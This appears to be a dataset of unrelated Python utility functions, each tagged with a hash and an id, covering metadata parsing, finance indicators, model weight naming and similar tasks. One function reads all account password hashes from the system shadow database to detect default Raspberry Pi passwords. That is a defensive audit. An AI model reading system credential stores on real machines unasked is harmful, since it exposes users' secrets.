def metadata_format(metadata): """Formats metadata extracted from a .tif file""" metadata_dic = {'Channel 1 Parameters':{'ExcitationWavelength':0.0,'EmissionWavelength':0.0},'Channel 2 Parameters':{'ExcitationWavelength':0.0,'EmissionWavelength':0.0}, 'Channel 3 Parameters':{'ExcitationWavelength':0.0, 'EmissionWavelength':0.0}, 'Channel 4 Parameters':{'ExcitationWavelength':0.0, 'EmissionWavelength':0.0}, 'refr_index': 0.0, 'num_aperture':0.0,'pinhole_radius':0.0,'magnification':0.0, 'Axis 3 Parameters Common':{'EndPosition':0.0,'StartPosition':0.0,'MaxSize':0.0}, 'Axis 0 Parameters Common':{'EndPosition':0.0, 'StartPosition':0.0, 'MaxSize':0.0}} metadata_dic['Channel 1 Parameters']['ExcitationWavelength'] = float(metadata['[Channel1Parameters]ExcitationWavelength']) metadata_dic['Channel 2 Parameters']['ExcitationWavelength'] = float(metadata['[Channel2Parameters]ExcitationWavelength']) metadata_dic['Channel 3 Parameters']['ExcitationWavelength'] = float(metadata['[Channel3Parameters]ExcitationWavelength']) metadata_dic['Channel 4 Parameters']['ExcitationWavelength'] = float(metadata['[Channel4Parameters]ExcitationWavelength']) metadata_dic['Channel 1 Parameters']['EmissionWavelength'] = float(metadata['[Channel1Parameters]EmissionWavelength']) metadata_dic['Channel 2 Parameters']['EmissionWavelength'] = float(metadata['[Channel1Parameters]EmissionWavelength']) metadata_dic['Channel 3 Parameters']['EmissionWavelength'] = float(metadata['[Channel1Parameters]EmissionWavelength']) metadata_dic['Channel 4 Parameters']['EmissionWavelength'] = float(metadata['[Channel1Parameters]EmissionWavelength']) metadata_dic['num_aperture'] = float(metadata['ObjectiveLensNAValue']) metadata_dic['pinhole_radius'] = (float(metadata['PinholeDiameter']))/2 metadata_dic['magnification'] = 0.75 metadata_dic['refr_index'] = 1.5 metadata_dic['Axis 3 Parameters Common']['EndPosition'] = float(metadata['[Axis3ParametersCommon]EndPosition']) metadata_dic['Axis 3 Parameters Common']['StartPosition'] = float(metadata['[Axis3ParametersCommon]StartPosition']) metadata_dic['Axis 3 Parameters Common']['MaxSize'] = float(metadata['[Axis3ParametersCommon]MaxSize']) metadata_dic['Axis 0 Parameters Common']['MaxSize'] = float(metadata['[Axis0ParametersCommon]MaxSize']) metadata_dic['Axis 0 Parameters Common']['EndPosition'] = float(metadata['[ReferenceImageParameter]HeightConvertValue']) return metadata_dic
00bff49d004e650332512d5f1979b5d56dc74662
24,656
def create_stratum_name(stratification_name, stratum_name, joining_string="X"): """ generate a name string to represent a particular stratum within a requested stratification :param stratification_name: str the "stratification" or rationale for implementing the current stratification process :param stratum_name: str name of the stratum within the stratification :param joining_string: str the character to add to the front to indicate that this string is the extension of the existing one in SUMMER, capitals are reserved for non-user-requested strings, in this case "X" is used as the default :return: str the composite string for the stratification """ return joining_string + "%s_%s" % (stratification_name, str(stratum_name))
d778f2538c3e9c451bcafba287ef34fcc5bed07b
24,658
import socket def get_node_address(node_name=''): """ Return the IP address associated to the node's domain. This is by no means perfect and should not be relied upon aside from testing purpose. """ return socket.gethostbyname(socket.getfqdn(node_name))
d3f8b5c39118cf05e195d82430f024ef27d01c21
24,659
import time def _translate_param_name_to_real_path_key(*args): """ """ keys = list() keys.append(args[0].__name__) keys.append(args[1]) try: keys.append(args[2]) except IndexError: keys.append("Resource") keys.append(time.time() // (60 * 60 * 24)) return keys
deb7e36e7f25264586e8fae15bea78702dba1ade
24,661
def extract_muMax(df_Annotations): """ Extracts the growth rate (Slope) for each sample. Parameters ---------- df_Annotations : pandas.DataFrame The dataframe contains the results of a linear fit through the exponential growth phase. Returns ------- df_mu : pandas.DataFrame A dataframe that shows the calculated maximal growth rate for each sample. """ # Delete index name and transform df_Annotations.index.name = None df_mu = df_Annotations.T # Keep only sample name and slope df_mu.reset_index(inplace=True) df_mu = df_mu.rename(columns={"index": "samplename_OD"}) df_mu = df_mu[["samplename_OD", "Slope"]] df_mu["samplename_OD"] = df_mu["samplename_OD"].str[:6] # Rename slope df_mu.rename(columns={"Slope": "mu[/h]"}, inplace=True) return df_mu
63ca33ddf29c0bfc1ee1af49ef5b6ad4f89829ff
24,663
def _parse_system_prop(line): """Returns the name and value of a system property (The line is preceded by @). Args: line (str): The definition of the system property. Returns: str, str: Pair of name, value. """ return line[1:].split("#")[0].split("=")
f2822175a717f9ee96524438eaa610898f7fb613
24,664
def pentad_to_month_day(p): """ Given a pentad number, return the month and day of the first day in the pentad :param p: pentad number from 1 to 73 :type p: integer :return: month and day of the first day of the pentad :rtype: integer """ assert 0 < p < 74, 'p outside allowed range 1-73 ' + str(p) m = [1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12] d = [1, 6, 11, 16, 21, 26, 31, 5, 10, 15, 20, 25, 2, 7, 12, 17, 22, 27, 1, 6, 11, 16, 21, 26, 1, 6, 11, 16, 21, 26, 31, 5, 10, 15, 20, 25, 30, 5, 10, 15, 20, 25, 30, 4, 9, 14, 19, 24, 29, 3, 8, 13, 18, 23, 28, 3, 8, 13, 18, 23, 28, 2, 7, 12, 17, 22, 27, 2, 7, 12, 17, 22, 27] return m[p - 1], d[p - 1]
183c3954fe6ee003af28ca13d2a2207812d66483
24,665
def isMobile(request): """ Detecta si se estรก conectado en un dispositivo movil. """ return False # IMPORTANTE QUITAR ESTO SOLO PRUEBAS. mobile_browser = False ua = request.META['HTTP_USER_AGENT'].lower()[0:4] if (ua in mobile_uas): mobile_browser = True else: for hint in mobile_ua_hints: if request.META['HTTP_USER_AGENT'].lower().find(hint.lower()) > 0: mobile_browser = True return mobile_browser
3564e51b20baa4cd800581cc1195dc23ecda2829
24,668
def check_column_uniformity(dataframe, colname): """ Check uniformity of a column. Useful when ensuring merges worked correctly. :param dataframe: :param colname: :return: """ if colname in dataframe.columns: unique_col_values = dataframe[colname].unique() num_unique_values = len(unique_col_values) assert num_unique_values == 1, \ 'There are {} unique values for {}: \n {}'.format( num_unique_values, colname, unique_col_values) return None
db4225375524a48fe17922172764e7c700aeb526
24,672
import threading def threaded(function): """Helper for threading. 'function' is the decorated function.""" def wrapper(*args): """Thread wrapper. 'args' is the arguments of the decorated function.""" thread = threading.Thread(target = function, args = args) thread.start() return wrapper
5404eb2f04180a37ad9b1dfef6b752786d052637
24,673
import random def construct_positive_and_negative_pairs(concept_list,synonym_pairs,neg_posi_rate): """ returns: positive pairs and negative pairs.And the number of negative samples is neg_posi_rate more than synonym pairs(positive samples) """ negative_pairs = [] for i,(mention,_) in enumerate(synonym_pairs): for _ in range(neg_posi_rate): concept = random.sample(concept_list,1)[0] while (mention,concept) in synonym_pairs or (mention,concept) in negative_pairs:#avoid overlapping concept = random.sample(concept_list,1)[0] negative_pairs.append((mention,concept)) return synonym_pairs,negative_pairs
da0a7354e23941718cf7d1c5fdeda23497ebe032
24,675
import numpy def selectChannel(weights, weightIndexToNodeLUT): """ Randomly selects a counterparty based on weights according to a LUT Returns the node id (or -1 if none could be found) Parameters ---------- weights: a list of weights to be used for normalizing the random selection weightIndexToNodeLUT: a LUT translating the weights list to node ids """ rand = numpy.random.rand() totalWeight = sum(weights) sumWeights = 0 counterparty = -1 for i in enumerate(weights): sumWeights += i[1] if totalWeight == 0: sumWeights = 0 else: if sumWeights / totalWeight >= rand: counterparty = weightIndexToNodeLUT[i[0]] break; return counterparty
4d62306297ab20923b75d014527cb2d1f174fa13
24,677
def balance_from_utxos(utxos): """Return balance of a list of utxo. Args: utxos: A list of utxo with following format. [{ txid: '' value: 0, vout: 0, scriptPubKey: '', }] Returns: A balance sum of value value. """ balance = 0 if utxos: balance = sum(utxo['value'] for utxo in utxos) return balance
e20373db24483bb33189b396da44b2c453b717d9
24,678
def next_key(key): """ Calculates the next partition value of a key. Note: Cassandra BOP orders 'b' before 'aa'. Args: key: A string containing a Cassandra key. Returns: A string containing the next partition value. """ mutable_key = list(key) mutable_key[-1] = chr(ord(key[-1]) + 1) return ''.join(mutable_key)
dd9b076e9f4a916ff4f8520596d4d1386497937e
24,679
def remain_tags_space(text, tags_space): """ :param tags_space: tag to remained { "ruby on rails": "ruby_on_rails", ... } """ for tag in tags_space: text = text.replace(tag, tags_space[tag]) return ['_'.join(tag.split()) for tag in tags_space]
97a9075f868d363a772797cf9c333392baa9e9e5
24,680
def export_annual_result(donations): """ Export and aggregate entire year resuls. """ money = 0 donators = 0 report = '' report += "%d days of donations" % (len(donations.keys())) for k in donations.keys(): money += donations[k]['sum'] donators += donations[k]['quantity'] report += "Total donations: %d\nTotal donators: %d" % (money, donators) return report
9772e6bfa459b6201dec16f65f2cf73b5f41a32c
24,681
import os def isUnzippedEgg(path): """ Check whether a filesystem path points to an unzipped egg; z3c.autoinclude does not support zipped eggs or python libraries that are not packaged as eggs. This function can be called on e.g. entries in sys.path or the location of a distribution object. """ return os.path.isdir(path)
74997d2707da97c8b22a529f2fc5d06d6141f1f4
24,684
from typing import Counter def most_common_letter(s: str) -> str: """Returns the most common letter in a string.""" return Counter(s).most_common(1)[0][0]
9cf0d1fb6790a2f5a72dff976423868c0dce9a89
24,685
def findpos(M, x): """ See figure 9 in reference. """ if x.is_text() or x.is_attribute(): return 0 y = x.parent children = y.elements() #find the rightmost inorder node left of x (v) index = children.index(x) v = None for i in range(index): c = children[i] if c.inorder: v = c if v is None: return 1 u = M.right[v] children = u.parent.elements() index = children.index(u) + 1 return index + 1
168072d6a21d916af09039fbc898cf9b2793ea5c
24,692
def dim_in_bnd(x, dim, a, b): """Dimension between bounds indicator function""" z = x[dim] sup_a = a < z inf_b = z < b res = sup_a * inf_b return res
3db1788d02843d01b7975523f28f253e77d510d3
24,693
import os def find_version(package): """Read package version string from __init__.py""" with open(os.path.join(package, '__init__.py')) as fid: for line in fid.readlines(): if line.startswith('__version__'): line = line[:line.find('#')] # strip comment, if any version = line.split('=', 2)[1].strip() if version[0] != version[-1] or version[0] not in "\"'": break return version[1:-1] raise RuntimeError("Could not read version from %s/__init__.py"%package)
b6c28439e68f7d292142ce02f9e4644f199e4651
24,694
def captcha_halfway(numbers): """Sum the digits that match the one half way around a cyclic string.""" total = 0 for i in range(int(len(numbers) / 2)): if numbers[i] == numbers[i + int(len(numbers) / 2)]: total += int(numbers[i]) return total * 2
c772c194c038484c144337dd32d93ab74e1d9370
24,696
def get_all_regions(config): """Retrieve a set of all regions used by the declared integration tests.""" regions = set() for feature in config.get("test-suites").values(): for test in feature.values(): for dimensions_config in test.values(): for dimensions_group in dimensions_config: regions.update(dimensions_group.get("regions", [])) return regions
c2dfddc73601f3661f482cf0ed5547b9b8434689
24,697
def RSI(list): """ Relative Strength Index 1. ๊ฐ€๊ฒฉ์ด ์ „์ผ ๊ฐ€๊ฒฉ๋ณด๋‹ค ์ƒ์Šนํ•œ ๋‚ ์˜ ์ƒ์Šน๋ถ„์€ U(up) ๊ฐ’์ด๋ผ๊ณ  ํ•˜๊ณ , 2. ๊ฐ€๊ฒฉ์ด ์ „์ผ ๊ฐ€๊ฒฉ๋ณด๋‹ค ํ•˜๋ฝํ•œ ๋‚ ์˜ ํ•˜๋ฝ๋ถ„์€ D(down) ๊ฐ’์ด๋ผ๊ณ  ํ•œ๋‹ค. 3. U๊ฐ’๊ณผ D๊ฐ’์˜ ํ‰๊ท ๊ฐ’์„ ๊ตฌํ•˜์—ฌ ๊ทธ๊ฒƒ์„ ๊ฐ๊ฐ AU(average ups)์™€ AD(average downs)๋ผ ํ•œ๋‹ค. 4. AU๋ฅผ AD๊ฐ’์œผ๋กœ ๋‚˜๋ˆˆ ๊ฒƒ์„ RS(relative strength) ๊ฐ’์ด๋ผ๊ณ  ํ•œ๋‹ค. RS ๊ฐ’์ด ํฌ๋‹ค๋Š” ๊ฒƒ์€ ์ผ์ • ๊ธฐ๊ฐ„ ํ•˜๋ฝํ•œ ํญ๋ณด๋‹ค ์ƒ์Šนํ•œ ํญ์ด ํฌ๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•œ๋‹ค. 5. ๋‹ค์Œ ๊ณ„์‚ฐ์— ์˜ํ•˜์—ฌ RSI ๊ฐ’์„ ๊ตฌํ•œ๋‹ค. RSI = RS / (1 + RS) RSI = AU / (AU + AD) """ list_length = len(list) u_list = [] u_sum = 0 d_list = [] d_sum = 0 try: for i in range(1, list_length): if (list[i] > list[i - 1]): # ์ „์ผ ๊ฐ€๊ฒฉ๋ณด๋‹ค ์ƒ์Šนํ•œ ๋‚  u_list.append((list[i] - list[i - 1])) u_sum = u_sum + (list[i] - list[i - 1]) elif (list[i] < list[i - 1]): # ์ „์ผ ๊ฐ€๊ฒฉ๋ณด๋‹ค ํ•˜๋ฝํ•œ ๋‚  d_list.append((list[i - 1] - list[i])) d_sum = d_sum + (list[i - 1] - list[i]) else: pass if len(u_list) == 0: return 0 else: AU = u_sum / len(u_list) if len(d_list) == 0: AD = 0 else: AD = d_sum / len(d_list) return AU / (AU + AD) except ZeroDivisionError as e: return 0
33e18b915813be93c41bf09edc110f64e93e89a1
24,698
def keras_name_to_tf_name_block(keras_name, keras_block='block1a', tf_block='blocks_0', use_ema=True, model_name_tf='efficientnet-b0'): """Mapping name in h5 to ckpt that belongs to a block. we map name keras_name that points to a weight in h5 file to a name of weight in ckpt file. Args: keras_name: str, the name of weight in the h5 file of keras implementation keras_block: str, the block name for keras implementation (e.g. 'block1a') tf_block: str, the block name for tf implementation (e.g. 'blocks_0') use_ema: Bool, use the ExponentialMovingAverage resuolt in ckpt or not model_name_tf: str, the name of model in ckpt. Returns: String for the name of weight as in ckpt file. Raises: ValueError if keras_block does not show up in keras_name """ if keras_block not in keras_name: raise ValueError('block name {} not found in {}'.format( keras_block, keras_name)) # all blocks in the first group will not have expand conv and bn is_first_blocks = (keras_block[5] == '1') tf_name = [model_name_tf, tf_block] # depthwide conv if 'dwconv' in keras_name: tf_name.append('depthwise_conv2d') tf_name.append('depthwise_kernel') # conv layers if is_first_blocks: # first blocks only have one conv2d if 'project_conv' in keras_name: tf_name.append('conv2d') tf_name.append('kernel') else: if 'project_conv' in keras_name: tf_name.append('conv2d_1') tf_name.append('kernel') elif 'expand_conv' in keras_name: tf_name.append('conv2d') tf_name.append('kernel') # squeeze expansion layers if '_se_' in keras_name: if 'reduce' in keras_name: tf_name.append('se/conv2d') elif 'expand' in keras_name: tf_name.append('se/conv2d_1') if 'kernel' in keras_name: tf_name.append('kernel') elif 'bias' in keras_name: tf_name.append('bias') # batch normalization layers if 'bn' in keras_name: if is_first_blocks: if 'project' in keras_name: tf_name.append('tpu_batch_normalization_1') else: tf_name.append('tpu_batch_normalization') else: if 'project' in keras_name: tf_name.append('tpu_batch_normalization_2') elif 'expand' in keras_name: tf_name.append('tpu_batch_normalization') else: tf_name.append('tpu_batch_normalization_1') for x in ['moving_mean', 'moving_variance', 'beta', 'gamma']: if x in keras_name: tf_name.append(x) if use_ema: tf_name.append('ExponentialMovingAverage') return '/'.join(tf_name)
6a249f992be1c1232ba8415523b8408be5680133
24,699
def _2set(src): """่ฝฌไธบ set Args: src (Any): ไปปๆ„็ฑปๅž‹ Returns: set: ้›†ๅˆ """ ret = src if not isinstance(src, set): ret = set() ret.add(src) return ret
1a6bc871ecda8f89364c02cc47b03e69d4c28d07
24,701
from pathlib import Path import crypt import spwd def check_for_default_passwords(config_path): """ Check if the 'pi' user current password hash is in our list of default password hashes. """ base_dir = Path(config_path) pass_hashes_file_path = base_dir.joinpath('pass_hashes.txt') # For deb installation. if not pass_hashes_file_path.is_file(): base_dir = Path(__file__).resolve().parent.parent pass_hashes_file_path = base_dir.joinpath('misc/pass_hashes.txt') with pass_hashes_file_path.open() as f: read_data = f.read() known_passwords = {} for username_password in read_data.splitlines(): username, password = username_password.split(':', maxsplit=1) pw = known_passwords.get(username, []) pw.append(password) known_passwords[username] = pw def hash_matches(pwdp, plaintext_password): i = pwdp.rfind('$') salt = pwdp[:i] crypted = crypt.crypt(plaintext_password, salt) return crypted == pwdp for shadow in spwd.getspall(): encrypted_password = shadow.sp_pwdp for password in known_passwords.get(shadow.sp_namp, []): if hash_matches(encrypted_password, password): return True return False
cfad84c0e324538aa575bb3fe63cf66750739983
24,702
def power_num(number: float, power: int) -> float: """ Raise the number to the power if number >= 0. """ # The number can be int or float if not isinstance(number, int) and not isinstance(number, float): raise TypeError("The number can only be int or float") # The power can only be int if not isinstance(power, int): raise TypeError("The power can only be of int type") # If number > 0, we compute the calculation if number >= 0: return round(number ** power, 2) raise TypeError("The number can only be >= 0")
8a54f3f48b9892e9f32a0789624a0a6a76a7029f
24,703
def chirp_mass_and_mass_ratio_to_total_mass(chirp_mass, mass_ratio): """ Convert chirp mass and mass ratio of a binary to its total mass. Parameters ---------- chirp_mass: float Chirp mass of the binary mass_ratio: float Mass ratio (mass_2/mass_1) of the binary Return ------ mass_1: float Mass of the heavier object mass_2: float Mass of the lighter object """ return chirp_mass * (1 + mass_ratio) ** 1.2 / mass_ratio ** 0.6
3a01820239a2eceeea35794d2cd5aa781bf59315
24,704
def _format_version(name): """Formats the string name to be used in a --version flag.""" return name.replace("-", "_")
9b0bb72d6cef2836dce1f6c0d167ba41ce5a487b
24,705
import math def rho2_rho1(M, beta, gamma): """Density ratio across an olique shock (eq. 4.8) :param <float> M: Mach # upstream :param <float> Beta: Shock angle w.r.t initial flow direction (radians) :param <float> gamma: Specific heat ratio :return <float> Density ratio r2/r1 """ m1sb = M * math.sin(beta) n1 = (gamma + 1.0) * m1sb ** 2 d1 = 2.0 + (gamma - 1.0) * m1sb ** 2 return n1 / d1
20de69d2ac14100cd8c88e3f51eb14220052195b
24,706